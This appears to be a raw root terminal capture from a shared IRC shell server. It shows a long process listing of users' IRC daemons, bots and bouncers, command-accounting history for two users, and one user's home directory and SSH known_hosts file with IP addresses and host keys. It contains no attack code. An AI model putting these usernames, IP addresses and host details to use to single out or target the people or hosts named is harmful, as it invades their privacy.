root          36  0.0  0.0     0     8  ??  DL   27Jan08  15:56.90 [pagedaemon]
root          37  0.0  0.0     0     8  ??  DL   27Jan08   0:01.89 [vmdaemon]
root          38  0.0  0.0     0     8  ??  DL   27Jan08  98:08.61 [pagezero]
root          39  0.0  0.0     0     8  ??  DL   27Jan08   3:59.11 [bufdaemon]
root          40  0.0  0.0     0     8  ??  DL   27Jan08 519:04.35 [syncer]
root          41  0.0  0.0     0     8  ??  DL   27Jan08   5:03.46 [vnlru]
root          42  0.0  0.0     0     8  ??  DL   27Jan08  56:44.12 [softdepflush]
root          43  0.0  0.0     0     8  ??  DL   27Jan08  96:57.63 [schedcpu]
root         753  0.0  0.0   528     0  ??  IWs  -         0:00.00 /sbin/devd
root         808  0.0  0.0  1376   368  ??  Ss   27Jan08  29:30.11 /usr/sbin/syslogd -s
root         905  0.0  0.0  1288   108  ??  Ss   27Jan08   0:38.65 /usr/sbin/usbd
nobody       921  0.0  0.1  2368   644  ??  Ss   27Jan08  10:21.51 proftpd: (accepting connections) (proftpd)
root         973  0.0  0.0  1444   344  ??  Is   27Jan08   9:25.16 /usr/sbin/cron -s
nodex       1211  0.0  0.1  4892   620  ??  S    27Jan08   2:16.48 ./services
nodex       1219  0.0  0.1  3408   796  ??  S    27Jan08  20:22.77 ircd: irc.nodexirc.net (ircd)
crazyl      1230  0.0  0.2  3484  1896  ??  S    27Jan08  62:45.21 ./eggdrop ApocBot.conf (eggdrop-1.6.18)
crazyl      1241  0.0  0.2  3952  2400  ??  S    27Jan08  93:52.56 ./eggdrop Hibben.conf (eggdrop-1.6.18)
crazyl      1248  0.0  0.2  4128  2352  ??  S    27Jan08  96:56.14 ./eggdrop CLBot.conf (eggdrop-1.6.18)
root        2937  0.0  0.0  1408   204  ??  Is   27Jan08   2:15.57 oidentd
ioplex      4479  0.0  0.2  5228  1608  ??  Ss   10Jun09   2:15.27 ./psybnc conf
roodyk      7496  0.0  0.0  4512   496  ??  Ss   26Apr09   0:34.85 ./sbnc
roodyk      7497  0.0  0.2  7760  2416  ??  S    26Apr09   2:06.67 ./sbnc --rpc-child
bluewish    8293  0.0  0.1  1580   524  ??  Ss   31Mar09   3:18.90 ./energymech
skypilot   11073  0.0  0.0  1508     0  ??  IWs  -         0:00.00 ./bnc
ste        12145  0.0  0.2  3936  2368  ??  Ss   15Jun09   6:32.39 /usr/home/ste/bsd mob
ste        12182  0.0  0.2  4960  2556  ??  Ss   15Jun09   7:31.60 /usr/home/ste/bsd player
lordy      12679  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
lordy      12680  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
lordy      12682  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
lordy      12683  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
lordy      12684  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
lordy      12685  0.0  0.0     0     0  ??  Z    13Jun09   0:00.01 
lordy      12686  0.0  0.0     0     0  ??  Z    13Jun09   0:00.01 
lordy      12687  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
lordy      12689  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
lordy      12690  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
lordy      12691  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
lordy      12692  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
lordy      12695  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
lordy      12696  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
lordy      12697  0.0  0.0     0     0  ??  Z    13Jun09   0:00.01 
lordy      12701  0.0  0.0     0     0  ??  Z    13Jun09   0:00.01 
crrj13     15843  0.0  0.3  5508  2696  ??  S    28Apr09   3:57.42 ircd: lambda.bitsjointirc.net (ircd)
daali      18199  0.0  0.0  2888     0  ??  IWs  -         0:00.00 ./bnc bnc.conf
daali      18620  0.0  0.0  2716     0  ??  IWs  -         0:00.00 ./bnc bnc.conf
scouse     19191  0.0  0.1  2956  1152  ??  S    27Nov08 825:22.21 ircd: irc.toughsociety.com (ircd)
scouse     19383  0.0  0.1  7296   676  ??  S    27Nov08   0:46.99 ./services -logchan
root       21928  0.0  0.2  5476  2020  ??  Is    9:10PM   0:00.07 sshd:  (sshd)
root       22109  0.0  0.2  5344  2024  ??  Ss    9:15PM   0:00.09 sshd:  (sshd)
blotch     22806  0.0  1.2 18352 12200  ??  Ss   10Dec08 4616:08.79 /usr/home/blotch/inspircd/bin/inspircd
shoes      25037  0.0  0.2  5092  2132  ??  S    23Sep08 156:12.96 ./eggdrop ./bot.conf (eggdrop-1.6.19)
shoes      25039  0.0  0.2  5152  2160  ??  S    23Sep08 153:40.81 ./eggdrop ./bot.conf (eggdrop-1.6.19)
crazyl     25232  0.0  0.3  4344  2676  ??  S    31Jan09  28:34.31 ./eggdrop cx4storm.conf (eggdrop-1.6.18)
narcissu   26686  0.0  0.1  4740  1452  ??  S    11Mar08  22:41.05 ircd: beta.pseud0.net (ircd)
smash      26960  0.0  0.2 12128  2032  ??  Ss    9Nov08 147:51.60 /usr/home/smash/wraith/wraith iridium
blake96    27902  0.0  0.2  3344  1924  ??  S     8Nov08  23:08.58 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
lyhne1     29482  0.0  0.1  1448   700  ??  S     2Jan09 134:02.80 ./bopm
chrirc     33440  0.0  0.1  3520   776  ??  S    12Jun08  15:34.94 ircd: irc.ChristianIRC.net (ircd)
yaquis     43784  0.0  0.1  1520   736  ??  Ss   12Jun09   0:02.72 ./bnc
devil      43953  0.0  0.1  1592   620  ??  Ss    6Jul08  75:48.71 ./energymech
smash      44333  0.0  0.2  3936  1920  ??  Ss    5May09  22:54.47 /usr/home/smash/wraith/wraith fpck
ltootle    48390  0.0  0.2  7040  2456  ??  S    26Jun08 935:23.47 ircd: RedWolf.Wolfpac.Org (ircd)
root       51233  0.0  0.2  2268  1784  ??  Ss   11:50PM   0:07.93 screen
lordy      51655  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
lordy      51656  0.0  0.0     0     0  ??  Z     8Jun09   0:00.01 
lordy      51657  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
lordy      51658  0.0  0.0     0     0  ??  Z     8Jun09   0:00.01 
lordy      51659  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
lordy      51660  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
lordy      51661  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
lordy      51662  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
lordy      51663  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
lordy      51664  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
lordy      51665  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
lordy      51668  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
lordy      51669  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
y2j        53333  0.0  0.2  3296  1680  ??  S    22May09   4:05.27 ./psybnc
y2j        53335  0.0  0.3  4796  2992  ??  S    22May09   6:11.27 ./eggdrop IcEMaN.conf (eggdrop-1.6.17)
y2j        53336  0.0  0.4  6032  3608  ??  S    22May09   7:22.14 ./eggdrop SioN.conf (eggdrop-1.6.17)
ltootle    54810  0.0  0.1  8336   992  ??  S    26Jun08  24:35.00 ./services
bruhaha    59704  0.0  0.0  1528     0  ??  IWs  -         0:00.00 ./bnc
root       60582  0.0  0.2  5400  2036  ??  Is    3:32AM   0:00.60 sshd: romeo [priv] (sshd)
romeo      60584  0.0  0.2  5384  2088  ??  S     3:32AM   0:09.86 sshd:  (sshd)
root       63283  0.0  0.2  2332  1828  ??  Is   Wed10PM   0:01.12 screen
root       64492  0.0  0.1  2772   604  ??  Is   17Jun09   4:12.85 /usr/sbin/sshd
bruhaha    67858  0.0  0.1  1544   616  ??  Ss   23Aug08  17:43.63 ./bnc
bruhaha    70843  0.0  0.0  1516     0  ??  IWs  -         0:00.00 ./bnc
dealer     78536  0.0  0.1  8176  1316  ??  S    14Mar09 220:01.22 php dealbot.php
own3d      82309  0.0  0.1  2820   728  ??  Is   15Oct08   3:35.17 ./sbnc
lymelyte   88242  0.0  0.2  7720  2084  ??  Ss   29Mar09   4:33.70 ./epona
poolboy    89012  0.0  0.4  5752  3984  ??  S     8Feb09 320:59.08 ./eggdrop CAP0.conf (eggdrop-1.6.17)
redrum     91676  0.0  0.0  1280     0  ??  IW   -         0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
redrum     91678  0.0  0.0  1280     0  ??  IW   -         0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
redrum     91682  0.0  0.0  1280     0  ??  IW   -         0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
root       92538  0.0  0.0     0     8  ??  DL   Thu08AM   0:00.08 [accounting]
root       93821  0.0  0.1  1436   844  ??  Is   Thu08AM   0:00.00 inetd
root       98040  0.0  0.2  5368  2016  ??  Is    4:35PM   0:00.04 sshd: ioplex [priv] (sshd)
ioplex     98044  0.0  0.4  7364  4052  ??  I     4:35PM   0:02.03 sshd: ioplex (sshd)
crazie     98542  0.0  0.4  9732  3884  ??  S    19May09  36:58.07 ./l
crazie     98871  0.0  0.3  9236  3152  ??  S    19May09  13:26.08 ./mb2
crazie     99303  0.0  0.2  7512  2324  ??  S    19May09   7:43.22 ./mb6
root        1033  0.0  0.0  1344     0  v0  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv0
root        1034  0.0  0.0  1344     0  v1  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv1
root        1035  0.0  0.0  1344     0  v2  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv2
root        1036  0.0  0.0  1344     0  v3  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv3
root        1037  0.0  0.0  1344     0  v4  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv4
root        1038  0.0  0.0  1344     0  v5  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv5
root        1039  0.0  0.0  1344     0  v6  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv6
root        1040  0.0  0.0  1344     0  v7  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv7
darien9     2420  0.0  0.1 114060  1208  p0- S    16Mar08 799:19.15 ./psybnc
manboo      9260  0.0  0.1  3676   924  p0- S    22Apr08  20:51.79 ircd: irc.thederka.com (ircd)
manboo     11135  0.0  0.1  4288   620  p0- S    22Apr08   4:36.07 ./services
ac1115     21918  0.0  0.1 21512  1200  p0- S     2Jul08  15:39.60 ./psybnc
devil      22201  0.0  0.2 21412  1712  p0- S     2Nov08  46:45.70 ./psybnc
bpunux     27500  0.0  0.1  9476  1136  p0- S    31Oct08   9:22.64 ./psybnc
bpunux     28911  0.0  0.1  3068   976  p0- S    31Oct08   6:58.93 ./psybnc
tarawa     33111  0.0  0.3 29660  2640  p0- S    14Mar08 106:21.81 ./psybnc
reznik     33517  0.0  0.1 40788  1268  p0- S    27Apr08  44:00.81 ./psybnc
genosyde   34316  0.0  0.1  3192  1464  p0- S     5Jun08  39:10.11 ./eggdrop -m (eggdrop-1.6.18)
chrirc     40199  0.0  0.1  4248   628  p0- S    12Jun08   3:50.57 ./services
vamp       44090  0.0  0.2  3936  2464  p0- S    27Jan08 103:08.26 ./eggdrop guanoapes.conf (eggdrop-1.6.15)
vamp       44142  0.0  0.2  8352  2400  p0- S    27Jan08 102:58.38 ./eggdrop phante.conf (eggdrop-1.6.15)
vamp       44170  0.0  0.2  3720  2120  p0- S    27Jan08  93:42.97 ./eggdrop bengal.conf (eggdrop-1.6.15)
darien9    46897  0.0  0.1 84316  1384  p0- S     1Apr08 1518:35.73 ./psybnc
romeo      51236  0.0  0.2  3268  1836  p0  Is   11:50PM   0:00.03 /usr/local/bin/bash
romeo      51241  0.0  0.7  9932  6740  p0  S+   11:50PM   0:34.89 irssi -h absolute.ownage.net
burnt      59824  0.0  0.3  5952  3156  p0- S    27Jan08  54:17.27 ircd: wasted.ufc-pride.org (ircd)
burnt      59989  0.0  0.1  9012  1108  p0- S    27Jan08   5:52.73 ./services
sharpie    63388  0.0  0.2  3908  2172  p0- S    27Jan08  61:39.10 ./eggdrop egg (eggdrop-1.6.15)
daali      79885  0.0  0.3  5032  2656  p0- S    28Jan08  55:47.60 ./eggdrop (eggdrop-1.6.18)
darkevil   84286  0.0  0.1  3868   704  p0- S    25Mar08  17:04.32 ircd: irc.darkquest.org (ircd)
sharpie    95504  0.0  0.2  3812  2140  p0- S    25Apr08  53:07.90 ./eggdrop sun (eggdrop-1.6.15)
sharpie    95593  0.0  0.2  3708  2148  p0- S    25Apr08  51:59.24 ./eggdrop spank (eggdrop-1.6.15)
root       22120  0.0  0.2  3220  1888  p1  Ss    9:16PM   0:00.03 -bash (bash)
root       22827  0.0  0.1  1648   980  p1  R+    9:32PM   0:00.00 ps -auxwww
dark        3869  0.0  0.2 31228  2488  p2- S    22Apr09  11:35.44 ./psybnc
romeo       4433  0.0  0.1  2040  1448  p2  S+    7:09PM   0:00.04 screen -r
mooo       10652  0.0  0.2 41984  2284  p2- S    21May09  11:44.09 ./psybnc
tlm        11616  0.0  0.2 27520  1788  p2- S    26Apr09   4:20.44 ./psybnc
vamp       18167  0.0  0.1 29116  1320  p2- S     5Apr08  23:34.92 ./psybnc
wchan21    29220  0.0  0.2 10628  2024  p2- S    30Apr09   7:46.46 ./psybnc psybnc.conf
mimik0r    29613  0.0  0.2  5176  2248  p2- S    30May09   3:56.60 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
psycoz     29853  0.0  0.1  3248  1404  p2- S     7Jun09   1:13.18 ./psybnc
zeepysea   33510  0.0  0.1  1424   620  p2- S    20Mar08 291:26.11 ./bopm
lordy      33773  0.0  0.1  6120  1468  p2- S    30May09 440:58.20 ./bot
lordy      33777  0.0  0.1  3848   944  p2- S    30May09 360:11.97 ./bot
lordy      33783  0.0  0.2  7468  1684  p2- S    30May09 444:16.39 ./bot
lordy      33807  0.0  0.1  4696  1024  p2- S    30May09 439:42.64 ./bot
lordy      33811  0.0  0.1  5784  1088  p2- S    30May09 443:07.55 ./bot
narcissu   34556  0.0  0.1 136368   564  p2- S    20Feb08  38:20.52 ./psybnc
cmm        37284  0.0  0.2 22500  1724  p2- S    13Apr09   6:35.61 ./psybncD
devil      43929  0.0  0.2 15176  2316  p2- S    22May09   8:40.13 sshd
yaquis     47275  0.0  0.2  2976  1680  p2- S     6Jun09   1:51.67 ./eggdrop -m simple.conf (eggdrop-1.6.15)
chaos1     48442  0.0  0.3  3400  2812  p2- S    10:44PM   0:07.40 ircd: irc.sonicanime.net (ircd)
chaos1     48822  0.0  0.7  8296  7116  p2- S    10:52PM   0:01.09 /home/chaos1/core/anope/host/services
chaos1     49843  0.0  0.6  7060  6444  p2- S    11:19PM   1:36.17 /home/chaos1/core/eggdrop/eggdrop ./run.eggdrop (eggdrop-1.6.19)
tarawa     51960  0.0  3.6 82452 36732  p2- S    17May09  10:36.81 ./eggdrop Asurada.conf (eggdrop-1.6.19)
yaquis     52945  0.0  0.1  1432   960  p2- S    12:31AM   0:48.93 ./bopm
mlh        54757  0.0  0.2  3620  2108  p2- S     8Apr09   8:18.74 ./eggdrop a.conf (eggdrop-1.6.19)
safety     59083  0.0  0.2  3316  1752  p2- S    22May09   1:49.86 ./psybnc
brosco     59827  0.0  0.2  3912  2532  p2- S     1Jun09   3:41.68 ./eggdrop iphoney.conf (eggdrop-1.6.19)
romeo      60586  0.0  0.2  3244  1900  p2  Is    3:32AM   0:00.05 -bash (bash)
cpu        60695  0.0  0.2 12308  1880  p2- S    22May09   2:16.63 ./gramicci
bollox     61265  0.0  0.2  3556  2068  p2- S     1May09   5:46.65 ./eggdrop Prolapse.conf (eggdrop-1.6.18)
dealer     74736  0.0  0.2  3180  1636  p2- S     8Apr09   6:58.53 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
ircjaymz   75110  0.0  0.1 10012  1220  p2- S    18Mar08  24:56.65 ircd: ircdt.com (ircd)
redrum     80211  0.0  0.6  9244  6144  p2- S     9Jun09   9:12.34 ./eggdrop (eggdrop-1.6.19)
redrum     80260  0.0  0.6  6868  5764  p2- S     9Jun09   2:38.87 ./eggdrop ald.conf (eggdrop-1.6.19)
bollox     80752  0.0  0.2  3812  2152  p2- S     7Apr09   8:30.62 ./eggdrop Cerebrum.conf (eggdrop-1.6.18)
cazz1961   81636  0.0  0.2  3236  1784  p2- S     8May09  11:18.66 ./eggdrop voicer.conf (eggdrop-1.6.19)
poolboy    85768  0.0  2.3 38696 23352  p2- S    13Jun09 344:08.61 ./eggdrop PlaTaNo.conf (eggdrop-1.6.17)
qfx        85944  0.0  0.2  3592  2016  p2- S    10Jun09   0:53.81 ./psybnc
tarawa     88344  0.0  3.0 31980 30444  p2- S    26May09   5:41.99 ./eggdrop Rasetsu.conf (eggdrop-1.6.19)
bollox     90551  0.0  0.3  4188  2616  p2- S    10Jun09   4:03.14 ./psybnc
darien9      363  0.0  0.1 126420  1276  p3- S     6Mar08 967:34.73 ./psybnc
sysc        3001  0.0  0.1 53544  1492  p3- S    27Jan08  28:52.73 ./psybnc
sqd        15833  0.0  0.1 19444  1436  p3- S     4Aug08  27:53.54 ./psybnc
crazyl     37528  0.0  0.1 20120  1464  p3- S    27Nov08   8:58.67 ./psybnc
en0prcv    58418  0.0  0.1 67988  1228  p3- S     4Apr08  97:19.44 ./psybnc
skypilot   65653  0.0  0.0  7460   388  p3- S    19Nov08   2:43.71 /home/skypilot/NeoStats3.0//bin/neostats
chevym4n    6472  0.0  0.1  5156   772  p4- S    27Jan08  17:56.69 ircd: pdev.SummitIRC.com (ircd)
cpu        10289  0.0  0.2 27016  2152  p4- S    14Apr09   5:33.20 ./subdue
cpu        10303  0.0  0.2 24588  1896  p4- S    14Apr09   4:56.34 ./arc
oby1       18390  0.0  0.1 103980  1392  p4- S     8Oct08  37:31.06 ./psybnc
skypilot   43173  0.0  0.1  5612   968  p4- S     3Nov08  10:41.95 ircd: Stinger.SkyzNet.Net (ircd)
cmm        60721  0.0  0.3 100744  3488  p4- S    10Apr09  50:30.96 ./psybncC
cmm        60933  0.0  0.3 31732  2888  p4- S    10Apr09  26:32.93 ./psybncB
cmm        61190  0.0  0.2 26200  2420  p4- S    10Apr09  14:16.41 ./psybncR
pimpinjg   63286  0.0  0.2  3268  1776  p4  Is   Wed10PM   0:00.03 /usr/local/bin/bash
pimpinjg   63289  0.0  0.9 12636  9372  p4  S+   Wed10PM   1:16.45 irssi -h 72.20.28.217
darien9    74450  0.0  0.2 38220  2084  p4- S    31Oct08 107:35.62 ./psybnc
digitalman 97383  0.0  0.2 12644  2436  p4- S    20May09   6:43.68 ./psybnc psybnc.conf
chevym4n   11847  0.0  0.1  5892   756  p6- S    25Oct08  13:16.82 ircd: irc.SummitIRC.com (ircd)
crrj13     60894  0.0  0.4 14816  4384  p6- S     6May09   1:41.02 /home/crrj13/NeoStats3.0//bin/neostats
lynx       71244  0.0  0.1 15292  1164  p6- S    27Aug08  13:54.41 ./psybnc
yaquis     81249  0.0  0.2  2952  1664  p6- S     5Jun09   2:01.94 ./eggdrop -m simple.conf (eggdrop-1.6.15)
yaquis     81862  0.0  5.6 58788 57552  p6- S    13Jun09 119:13.68 ircd: coke.accesox.net (ircd)
darien9    95226  0.0  0.1  7876  1096  p6- S    23Jul08  20:45.03 ./psybnc
baxxta     95367  0.0  0.1  8020  1144  p6- S    22Jul08  13:11.93 ./psybnc
yaquis     98909  0.0  0.1  3140  1312  p6- S    30May09   1:26.70 ./psybnc
nardi      18637  0.0  0.1  1480   680  p7- S    10Mar09  33:41.69 ./bopm
crash      29763  0.0  0.3 32276  3504  p7- S    30Jan09 164:54.34 ./psybnc1
mlh        52784  0.0  0.3  4584  3340  p7- S    10Jan09  22:48.64 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
nyakz      54517  0.0  0.2 30984  2448  p7- S    13Mar09  52:56.09 ./psybnc
nardi      76675  0.0  0.1  5024   912  p7- S     8Feb09   7:16.69 ircd: Java.Albworld.Net (ircd)
sqd        77187  0.0  0.2  3352  1584  p7- S    21Jan09  13:05.79 ./eggdrop simple.conf (eggdrop-1.6.19)
darkuno3   77376  0.0  0.1  3400   792  p7- S    10Mar09   4:06.45 ircd: 72.20.28.219 (ircd)
lyhne1     88130  0.0  0.4 10540  3712  p7- S    22Dec08  69:14.36 ircd: BlackLotus.Sin-Clan.org (ircd)
lymelyte   88229  0.0  0.3  3880  3016  p7- S    29Mar09   7:28.37 ircd: irc.ftaresource.com (ircd)
chozen1    89082  0.0  0.1  3192  1032  p7- S     1Mar09   5:32.87 ./psybnc
kokoryu    93127  0.0  0.3  4060  2852  p7- S     6Feb09  32:11.57 ./eggdrop (eggdrop-1.6.19)
hts        96224  0.0  0.6 39004  6252  p7- S     2Mar09  51:21.25 ircd: vital.irc.hackthissite.org (ircd)
visage     96264  0.0  0.2  3192  1692  p7- S    13Mar09   9:27.48 ./eggdrop -m (eggdrop-1.6.19)
mrts       24165  0.0  0.2  3176  1612  p8- S    28Mar09   7:48.33 ./eggdrop euro.conf (eggdrop-1.6.19)
jax66      57226  0.0  0.1  1516   652  p8- S    11May09  24:51.69 ./bopm
brosco     58343  0.0  0.2 15992  1800  p8- S    29Mar09   8:13.84 ./psybnc
dv327      76866  0.0  0.1 27624  1208  p8- S     9Aug08  15:14.39 ./psybnc
subkult    88094  0.0  0.1 72724  1280  p8- S    15Jan09  80:54.12 ./psybnc
bluewish   97486  0.0  0.2  3552  1852  p8- S    29Mar09   8:28.42 ./eggdrop (eggdrop-1.6.19)
brosco     31552  0.0  0.3  3792  2592  p9- S    16Mar09  14:24.16 ./eggdrop cancer.conf (eggdrop-1.6.19)
mrts       32626  0.0  0.2  3176  1620  p9- S    20Mar09   8:36.07 ./eggdrop sins.conf (eggdrop-1.6.19)
poolboy    44789  0.0  0.2  3448  1956  p9- S     9Feb09  15:20.31 ./eggdrop DaB0SS.conf (eggdrop-1.6.17)
poolboy    44901  0.0  0.2  3312  1896  p9- S     9Feb09  15:07.57 ./eggdrop Little-JR.conf (eggdrop-1.6.17)
bollox     60129  0.0  0.3  5308  3376  p9- S     4Jun09   2:40.74 ./eggdrop cutenurse.conf (eggdrop-1.6.18)
bollox     60150  0.0  0.3  5164  3280  p9- S     4Jun09   2:23.03 ./eggdrop slutnurse.conf (eggdrop-1.6.18)
brosco     76877  0.0  0.2  3760  2348  p9- S    19Mar09  13:04.80 ./eggdrop-1.6.19 -m plague.conf
crash      99452  0.0  0.2 37052  2128  p9- S    19Mar09  12:20.42 ./psybnc-oth
paleride     265  0.0  0.2  3648  2092  pb- S    27Jan09  19:36.88 ircd: irc.leechnet.net (ircd)
paleride     908  0.0  0.1  4276   788  pb- S    27Jan09   1:40.52 ./services -nofork
grumpy     79140  0.0  0.3  5576  2692  pb- S     4Feb09  16:37.28 ircd: irc.sidnaceous.com (ircd)
grumpy     82947  0.0  0.1  7572  1140  pb- I     4Feb09   1:28.12 ./services start
nardi      17529  0.0  0.1 25992  1028  pc- S    24Mar09  23:43.99 ircd: ChatAlb.Albania.Rr.Nu (ircd)
cazz1961   17100  0.0  0.6  8824  6268  pd- S    Sun06AM  87:41.30 ircd: Smirnoff.1andallirc.net (ircd)
omgwtf     29455  0.0  0.2  3408  1996  pd- S    Sat04AM   0:48.34 ./eggdrop uno.conf (eggdrop-1.6.19)
omgwtf     29570  0.0  0.2  3572  2228  pd- S    Sat04AM   0:48.16 ./eggdrop ambition.conf (eggdrop-1.6.19)
zeepysea   37950  0.0  0.2  3684  1952  pd- S    17Mar09  10:42.06 ircd: irc.eoegameservers.com (ircd)
zeepysea   38077  0.0  0.1  8204  1092  pd- S    17Mar09   1:07.05 ./services start
genosyde   63662  0.0  0.2 17308  2432  pd- S    27Jan09  21:57.28 ./psybnc
matt       83686  0.0  0.1  3140  1184  pd- S    Sat05PM   0:17.40 ./psybnc psybnc.conf
mrts       84263  0.0  0.2  3172  1636  pd- S    20Mar09   8:46.15 ./eggdrop hez.conf (eggdrop-1.6.19)
yaquis     94000  0.0  0.5 58432  5312  pd- S    Fri10PM   4:51.24 ircd: irc2.accesox.net (ircd)
cont       49538  0.0  0.2 19684  1784  pe- S    11Jan09  12:46.04 ./psybnc
chaos1     56819  0.0  0.8 11604  8064  pf- I    18Jun09   0:40.97 /usr/bin/perl ./idlebot.pl (perl5.8.8)
[root@velocity:/var/run]# 

[root@velocity:~]# lastcomm -u romeo
sh               -       romeo            __         0.00 us
ls               -       romeo            __         0.00 us
screen           -F      romeo            __         0.00 us
screen           -F      romeo            __         0.00 us
w                -       romeo            ttyp1      0.00 us
sh               -       romeo            ttyp1      0.00 us
sshd             -F      romeo            __         0.59 us
bash             -       romeo            ttyp1      0.00 us
ls               -       romeo            ttyp1      0.00 us
w                -       romeo            ttyp1      0.00 us
screen           -       romeo            ttyp1      0.00 us
screen           -F      romeo            __         0.00 us
screen           -F      romeo            __         0.00 us
screen           -F      romeo            __         0.00 us
w                -       romeo            ttyp1      0.00 us
sh               -       romeo            ttyp1      0.00 us

[root@velocity:~]# lastcomm -u pimpinjg
sshd             -F      pimpinjg         __         0.00 us
bash             -       pimpinjg         ttyp2      0.00 us
screen           -       pimpinjg         ttyp2      0.00 us
screen           -F      pimpinjg         __         0.00 us
screen           -F      pimpinjg         __         0.00 us
screen           -F      pimpinjg         __         0.00 us
fortune          -       pimpinjg         ttyp2      0.00 us
sshd             -F      pimpinjg         __         0.00 us
sftp-server      -       pimpinjg         __         0.02 us
sshd             -F      pimpinjg         __         0.03 us
bash             -       pimpinjg         ttyp2      0.00 us
tput             -       pimpinjg         ttyp2      0.00 us
screen           -       pimpinjg         ttyp2      0.00 us
screen           -F      pimpinjg         __         0.00 us
screen           -F      pimpinjg         __         0.00 us
screen           -F      pimpinjg         __         0.00 us
fortune          -       pimpinjg         ttyp2      0.00 us


[root@velocity:/home/romeo]# ls -la 
total 80
drwxr-xr-x    4 romeo  romeo   512 Jun 27 21:56 ./
drwx--x--x  204 root   wheel  3584 Jun 17 18:30 ../
-rw-------    1 romeo  romeo     5 Jun 17 18:35 .bash_history
-rw-r--r--    1 romeo  romeo    44 Jun 13 08:05 .bash_profile
-rw-r--r--    1 romeo  romeo  2469 Jun 13 08:00 .bashprompt
-rw-r--r--    1 romeo  romeo   258 Jun 13 08:03 .bashrc
-rw-r--r--    1 romeo  romeo   767 Jun 13 07:56 .cshrc
-rw-r--r--    1 romeo  romeo    23 Jun 17 18:39 .forward
drwx------    4 romeo  romeo   512 Jun 17 09:42 irclogs/
drwx------    3 romeo  romeo   512 Jun 17 09:42 .irssi/
-rw-------    1 romeo  romeo    35 Jun 26 17:58 .lesshst
-rw-r--r--    1 romeo  romeo   248 Jun 13 07:56 .login
-rw-r--r--    1 romeo  romeo   158 Jun 13 07:56 .login_conf
-rw-------    1 romeo  romeo   373 Jun 13 07:56 .mail_aliases
-rw-r--r--    1 romeo  romeo   331 Jun 13 07:56 .mailrc
-rw-r--r--    1 romeo  romeo   797 Jun 13 07:56 .profile
-rw-------    1 romeo  romeo   276 Jun 13 07:56 .rhosts
-rw-r--r--    1 romeo  romeo   975 Jun 13 07:56 .shrc
drwx------    2 romeo  romeo   512 Jun 20 02:58 .ssh/

[root@velocity:/home/romeo]# cat .ssh/known_hosts 
72.20.6.198 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxYSZga5G62dznPwCooUV5e+kVQ8861IxS3aw3ZkDt9uzLZswbqN4iQmkP7bokLACE7Oz2nIiKkVwcjCF8qqO3lk4pdIJNxg6hTuQcZzPR9IHiK38ajERh2JlPPq1zyCwTvPJK8qTNuwZTcdrlJHrFcZpatepHSTu9hdjb+gF4e1oQNyC20nLtD0w1789tFfJKu/5J5jNEOtj7NyfqEwr3nN2iok4LbdZfK321htZwouCWcC2alEacjuYkcRZylgmxhek5dBqLO+LZTvyuppFTiz8RCmwbVSNK+NVgkj4e4WFcR9CoLh2mfW6o4EfE3d9cxFl9Jk/IHLYPQ/TRbaPVw==
189.14.205.42 ssh-dss AAAAB3NzaC1kc3MAAACBAJgf4VlHspyNWVtAQpi0Lsf78P5bted4NBEAk0MX6w0DNnomC1/kiqOa2pNeZSB05NT42z8+Pxc2a5JwNRolfbpRXPMvMvHYwDMsZAYerz6KOc04nwVskMLBP47bBV6IMbJf2DV7OMBuZI4Li7QfAyW/qJpwUnctChFjSscyv+srAAAAFQDiHNMyrvXk8AJkeKusaJ9vUGdtJwAAAIBr1lDX9MHqMpoeZFE3vX6VbrPfBqK5Zm0EgdSf9QdbGFVD5YcLQhyc88jsrR2sCUBNmQN9hV8o7NedqAFQK1RKToN7ZvrzuFNcOT+yO6/B1Z2WniNojmrbd7/27dJCQz02yXl96f1pFUUcU7gRMdgI9WngNqOE8ZMl3B/jw/MwuAAAAIAoMJDeUlKhowiywrlFC511AfRe+5KfhqK2ohhKne1yr4r5fBrVeTsZeN39qeu23dUOTc7xXP47Iu7STxF7vX6Jw29OWx9vytwbCGNHPMr1kTgRr9n+lHutOZmCqvag2rALA8gs+KUfYrwdUs1p7PDVuTO8bk4HRSPs9wCQnlmpOg==
